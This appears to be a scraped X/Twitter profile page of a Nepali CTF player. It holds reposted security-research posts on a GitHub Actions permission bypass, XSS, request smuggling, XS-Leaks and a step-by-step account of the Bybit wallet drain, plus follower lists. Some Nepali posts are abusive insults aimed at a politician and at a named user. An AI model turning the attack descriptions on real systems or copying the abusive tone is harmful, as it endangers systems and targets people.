Dipendra Shrestha @StructHack
Interested in web... CTF with Hack@Sec. Nepal🇳🇵 Joined July 2018-
Tweets148
-
Followers137
-
Following279
-
Likes2K
Good lord 🤮
セキュリティリサーチャー RyotaK @ryotkak の技術ブログを公開しました。 今回、Claude Code GitHub Actions の権限制御を外部の GitHub Issue 経由でバイパスし、ワークフロー権限を悪用できる脆弱性、並びにそれに付随する設定ミスを発見・報告しました。 当該の脆弱性は v1.0.94 で修正済みですが、設定ミスについては各リポジトリにて対応が必要であるため、当該製品を利用されている場合は設定の見直しと実行ログの確認を推奨します。 flatt.tech/research/posts…
Posting a mini XSS challenge! Goal is to pop an alert. I believe this trick is not well known. Intended solution is chrome only. Thanks to @kevin_mizu for beta testing! Don't post solutions in the thread; DM only! xss.hashkitten.io/xss1.html
That's my chain — a full chain w/ logic bugs only! No memory corruption, no AI, and of course no collisions at all 😉
Confirmed! Orange Tsai (@orange_8361) of DEVCORE Research Team (@d3vc0r3) chained 4 logic bugs to achieve a sandbox escape on Microsoft Edge, earning $175,000 and 17.5 Master of Pwn points. Full win! #Pwn2Own #P2OBerlin
nah im just not gonna run npm install anymore
We responsibly disclosed the issue to @github, who deployed a fix on GitHub.com the same day (!) and released patches for all supported GHES versions. GitHub Enterprise Server customers are strongly encouraged to update immediately.
I started playing CTFs in 2022, and LLMs definitely changed the **competitive** CTF scene a lot, especially since mid-2025. I also started using LLMs in late 2025. Yes, those models did one-shot many challenges, but what's the fun of slopping them? I learned absolutely nothing 🥲
@DeSolti I feel ashamed to have studied in the same class as you. J ho tei dekhauda k bhayo? "timing this timing that".. Timro ghar ko kasailai kei bhako bhaye bujthyeu hola..
i built an entire x86 CPU emulator in CSS (no javascript) you can write programs in C, compile them to x86 machine code with GCC, and run them inside CSS
I’ve been digging into HTTP Trailers and found some new smuggling techniques: sebsrt.xyz/blog/trailing-…
Chrome implements referrerpolicy on <input type="image">, despite it not being in the HTML spec. Like on the in-spec elements, it takes precedence over the document policy for that request and can be abused to leak the page URL via the Referer header. storage.googleapis.com/nowaskyjr/a/in…
Cross-Site ETag Length Leak blog.arkark.dev/2025/12/26/eta… I just posted the author writeup for impossible-leak in SECCON CTF 14 Quals. As far as I know, this is a new XS-Leak technique! The ETag header can become a side channel :)
प्रिय Gen Z, तपाईहरूको योगदान र बलिदानबाट देशले परिवर्तन पाएको छ। वीर सहिदहरूप्रति हार्दिक श्रद्धाञ्जली। तपाईंहरूको योगदान अमूल्य छ, जसले सधैं भावी पुस्तालाई देशप्रेम र कर्तव्यबोधको मार्गदर्शन गर्नेछ। तपाईहरूप्रति असिम सम्मान। घाइतेहरूको शीघ्र स्वास्थ्यलाभको कामना गर्दछु।
तेरो भरौटेहरूको पो बा भइस् । साँच्चै नै कहिले बा हुन पाएको भए पो छोरा छोरीको मृत्युको पीडा बुज्थिस । यस्तो आतङ्क वाद यो विश्वले कहिले देखेको थिएन । त नेता त के मान्छे पनि बन्न सकेनस, आतङ्क बादी होस । #kpoliisterriorist
Turns out my #PHRACK article is live! 🔥 > The Art of PHP — My CTF Journey and Untold Stories! Kinda a love letter to those CTF players & PHP nerds! Hope all the credit goes to the right ppl. Also huge thanks to @0xdea for not forgetting me, @guitmz for the edits, and the @Phrack crew for keeping it real! 🎉 phrack.org/issues/72/5_md…
I'm happy to release a script gadgets wiki inspired by the work of @slekies, @kkotowicz, and @sirdarckcat in their Black Hat USA 2017 talk! 🔥 The goal is to provide quick access to gadgets that help bypass HTML sanitizers and CSPs 👇 gmsgadget.com 1/4
It is pretty interesting that as I age and geohot ages, I end up noticing that we agree on more things than I thought in the past. This here is a good read: geohot.github.io//blog/jekyll/u… -- it's
I think many people are familiar with the topic of blind CSS exfiltration, especially after the post by @garethheyes However, an important update has occurred since then, which I wrote below ->
So, this is how lazarus drained 1.5 Billion 1) malicious JS injected into Safe{Wallet} at app.safe.global/_next/static/c… (because apparently, one of the nk devs just casually pushed it to production 🤡) 2) the JS modified executeTransaction() only if the signer was in a predefined list (Bybit’s multisig owners). 3) modified transaction now sets operation: 1 (delegatecall) to attacker address instead of a normal call. 4) delegatecall hits the attacker contract, which changed Safe contract's first storage slot which is masterCopy to a another attacker contract. 5) new masterCopy contract contained sweepETH() & sweepERC20(), draining $1.5B
Bybit Hack Forensics Report As promised, here are the preliminary reports of the hack conducted by @sygnia_labs and @Verichains Screenshotted the conclusion and here is the link to the full report: docsend.com/view/s/rmdi832…
1NFOS3C @W4RN1NG12
1 Followers 39 Following
Leverage 12 @12Leverage
44 Followers 3K Following
noone @Kariem_Alaa_
11 Followers 272 Following
zzzzzz @mynameisskool
6 Followers 153 Following
Rabindra Raj Sah @Rabindrarajshah
27 Followers 87 Following
Sagar Neupane @SagarNe30192419
12 Followers 340 Following
Ismail Arabi @IsmailArabi18
73 Followers 2K Following
Nabin Kafle @kaflenabin75
36 Followers 184 Following
Hack@Sec Official @hackasec
48 Followers 58 Following We ( Play | Build | Organize ) CTF. CTF Team: https://t.co/V6yWbHBLbQ For Sponsorship: [email protected]
RomonaPappas @PappasRomo97100
27 Followers 2K Following
Luke Hodgepodge @Hodgepodge7402
3 Followers 71 Following
Dhungana.04 @BishwasDhu57624
0 Followers 46 Following
Hari Bhadur @bhadurh69
0 Followers 38 Following
prashant shrestha @prashantstha17
54 Followers 190 Following
Nitesh thapa @Nitesht36129705
19 Followers 140 Following
Aayush Budhathoki @AayushB17272821
4 Followers 91 Following They believe in God, I believe in God Particles.
R......k @ROSHANKUDAVE3
457 Followers 526 Following pro humanity, anti everything that causes pain and suffering.... believe in 🕊️
fdxd @0xfdxd
1 Followers 222 Following
JustinBmz @Justin85563950
654 Followers 4K Following 22Y/o||No Certifications||Reading new bug bounty blogs applying on websites||Digital Marketing Specialist||Part Time Bug Hunter||Coder||AI Enthusiast||
Better call Anish @bettercallanish
1K Followers 709 Following Young (not so now), dumb ( cricket fan) , broke ( Engineer)
I_am_Bishal @C15C01337
2K Followers 3K Following Security Research Engineer 💂 Founder of CTF Team: Hack@Sec 🇳🇵 Crypto and Web w/@hackasec 🕸️ Blackhat MEA 2023/24/25 CTF Finalist 🎩 BBH at Hacker0x01 🐞🇳🇵
astitwo pandey @astitwo_pandey
7 Followers 207 Following
jexar jexar @JexarJ
4 Followers 388 Following
Nishit Barbhaya @Nishit369
1 Followers 42 Following
rachel david @racheld51074538
152 Followers 899 Following
Hailey Smith @HaileyS41499025
33 Followers 158 Following Cryptocurrency investor💱 Business owner Day trader 📈 Learn how to EARN extra INCOME daily , message me now
Zeeshan @zeeshan1338
396 Followers 6K Following Ethical Hacker ! Security Researcher And Software Engineer
Dheeraj Joshi @dheerajhere
797 Followers 2K Following 🦊 Staff Frontend Engineer. Interested in security, public speaking, fifa and coffee ☕️
Ismail Hossain @0x1ismailhridoy
0 Followers 237 Following
Mukesh @mukezhz
46 Followers 360 Following The thing we hate the most about recursion is what we hate the most about recursion. - recursion 😆
Sabin Timalsinaᅠᅠ... @the_sansab
60 Followers 150 Following
Jubayer Ahmed Rhyme @Jub4y3r_3x009
230 Followers 3K Following مهاجم آسيوي عشاق الأمن السيبراني | _-_ | المتعلم | باغ باونتي هنتر Web Application Security Researchers At Hackerone & Bugcrowd
BrunoZero @BrunoModificato
2K Followers 432 Following CTFer for: @Water_Paddler / Security auditor @osec_io my writeups: https://t.co/XurIhbWdj7 24y
phys @cffaedfe
201 Followers 25 Following
Gaurav Jha @pyderator
27 Followers 389 Following Full Stack Web Developer || Typescript Enthusiastic || GraphQL Enthusiastic || Cyber Security Enthusiastic || Bug Hunter
hashkitten @hash_kitten
2K Followers 178 Following vulnerability research @assetnote // hacking // codegolf // ctf with 🛹🐶
castilho @castilho101
1K Followers 258 Following Security Researcher at @ethiack CTF player for @xstf_team
Socket @SocketSecurity
22K Followers 5K Following Socket is the #1 software supply chain security platform. Next-gen SCA + SBOM + 0-day prevention. LOVED BY DEVELOPERS. 👀 @npm_malware
RyotaK @ryotkak
11K Followers 660 Following Security researcher? | Icon: @MelvilleTw | Private: @RyotaK_Private | Misskey: https://t.co/63E5Rpv2pk | Blog: https://t.co/c7NFQXhV90
Security Bug Aggregat... @BugsAggregator
3K Followers 1 Following Aggregate disclosed Chromium security bugs.
Samuel Groß @5aelo
25K Followers 524 Following Working on Project Zero, Big Sleep, and V8 Security. Personal account. Also @[email protected] and https://t.co/aVitnPjBie
Paul Seekamp @nullenc0de
17K Followers 628 Following I spend a significant amount of time reading security stuff. Co-Founder/Partner @CoastlineCyber https://t.co/ZQT5L8q2RO
Edouard Bochin @le_douds
357 Followers 79 Following
sebsrt @s3bsrt
722 Followers 542 Following I like to break stuff | Web Vuln Research & CTF @ARESxCTF @aboutblankets
RewriteLab @RewriteLab
443 Followers 15 Following A specialized research team focused on web security vulnerabilities and exploitation techniques
Ark @arkark_
2K Followers 883 Following Into experimental/deprecated features | CTF player | ex-traP
Z-Library @ZLib_Official
13K Followers 1 Following Official Twitter Account Of https://t.co/nlqXJzCDoR A.K.A former https://t.co/i8tnN6gkRS
hasherezade @hasherezade
91K Followers 954 Following Programmer, #malware analyst. Author of #PEbear, #PEsieve, #TinyTracer. Private account. All opinions expressed here are mine only (not of my employer etc)
Mandiant (part of Goo... @Mandiant
129K Followers 4K Following We’re determined to make organizations secure against cyber threats and confident in their readiness.
SuperFashi @SuperFashi1
2K Followers 708 Following Acceleration is a secular substitute for eternity.
Sin__ @mztropics
1K Followers 682 Following Binary reverse engineering/cybercrime investigations. Also interested in UAP/NHI.
nickharbour @nickharbour
5K Followers 222 Following Reverse Engineer with Google Cloud's FLARE Team. Organizer of the Flare-On challenge.
DeepComputing @DeepComputingio
1K Followers 276 Following Official account of DeepComputing. Turning RISC-V into Reality! Our community: https://t.co/lPorkbQNdN
Rebane @rebane2001
15K Followers 2K Following 🇪🇪🏳️⚧️ | Archivist | 12 CVEs in Chrome | CSS sophomore | MapartCraft | Puppy | Horse | rebane2001#3716 | Lyra (she/her) 🦊 @[email protected]
Gal Weizman @WeizmanGal
2K Followers 561 Following Security Researcher of Browsers, JavaScript, Web and AI • Created SnowJS (acquired by @metamask’s LavaMoat)
Roy @im_roy_lee
203K Followers 2K Following ceo @cluely | kicked out of columbia, harvard, community college graduate
Jorian @J0R1AN
2K Followers 420 Following Normalize being weird. (also here: https://t.co/cr9Y0kDEBi)
XBOW @Xbow
12K Followers 13 Following Bringing AI to offensive security by autonomously finding and exploiting web vulnerabilities. https://t.co/D5Mco1tAKe
Brendan Dolan-Gavitt @moyix
33K Followers 6K Following Building offsec agents: https://t.co/G9EtnC2Gl3 PGP https://t.co/3WXr0RfRkv
slonser @slonser_
5K Followers 205 Following Co-Founder @neploxaudit. CTF team @C4TBuTS4D Security Researcher.
Hacktron AI @HacktronAI
4K Followers 10 Following Hacktron is an autonomous vulnerability hunter for ambitious engineering teams. Built by world-class security researchers. Powered by one principle: PoC || GTFO
Freya Holmér @FreyaHolmer
125K Followers 1K Following ⭕ I made Shapes & Shader Forge 🔥 shader sorceress 🎨 artist 📏 math influencer 💜 twitch partner 📡 ex-founder of @NeatCorp banner: @YO_SU_RA
Sagar Neupane @SagarNe30192419
12 Followers 340 Following
Justin Gardner @Rhynorater
37K Followers 2K Following Christian | Full-time Bug Bounty Hunter | Host of @ctbbpodcast | Advisor @CaidoIO | 4x LHE MVH | 🗣️ English, 日本語 | ♥️ @mariahchan_ ♥️
JS0N Haddix @Jhaddix
176K Followers 7K Following CEO, CISO, Trainer, Hacker, and Speaker. Cybersecurity + Hacking + AI + Sec Leadership @arcanuminfosec
Harel @H4R3L
2K Followers 454 Following Professional Vulnerability Developer | Wannabe Security Researcher
Blaklis @Blaklis_
12K Followers 80 Following Security researcher - my researchs will be on https://t.co/2PnyCvqAIm Mostly inactive, soon replicated from BSKY.
Lupin @0xLupin
18K Followers 756 Following Roni Carta alias Lupin. Founder & CEO @ Depi. R&D. Red Teamer. Bug Hunter. Musician 🤘
ch @chybeta
14K Followers 5K Following open to bug bounty collaboration @HackenProof Security Researcher Just dm https://t.co/VVU1OV5yz6
Bug Bounty Reports Ex... @gregxsunday
54K Followers 613 Following Grzegorz Niedziela - a hacker who documents his hacking journey by creating and curating the best content about bug bounty and offensive security.
Smaran Chand @smaranchand
1K Followers 124 Following I act like a hacker but I am not & I tweet about Application & Cloud Security.
Youssef (s3c) @s3c_krd
10K Followers 547 Following Security researcher & Ambassador at Hackerone. Founder @haxeye_ #bugbounty #hacker #bugbounytips
crazyman @crazyman823886
1K Followers 1K Following CTFer / APT hunter / RedTeam / BlueTeam the member of @r3kapig the leader of @ShadowChasing1 CVE:CVE-2022-30190 pre account @CrazymanArmy
Hack@Sec Official @hackasec
48 Followers 58 Following We ( Play | Build | Organize ) CTF. CTF Team: https://t.co/V6yWbHBLbQ For Sponsorship: [email protected]
Google DeepMind @GoogleDeepMind
1.5M Followers 279 Following The engine room of @Google. Building AI safely and responsibly to solve the world’s most complex problems. Join us: https://t.co/jUHQA27iBL
Kévin GERVOT (Mizu) @kevin_mizu
7K Followers 780 Following Vulnerabilty researcher at @assetnote 🐛 | DOMLogger++ developer 👨🏻💻 | CTF with @FlatNetworkOrg, @rhackgondins 🦦 | @ECSC_TeamFrance 2023 🇫🇷
You might like
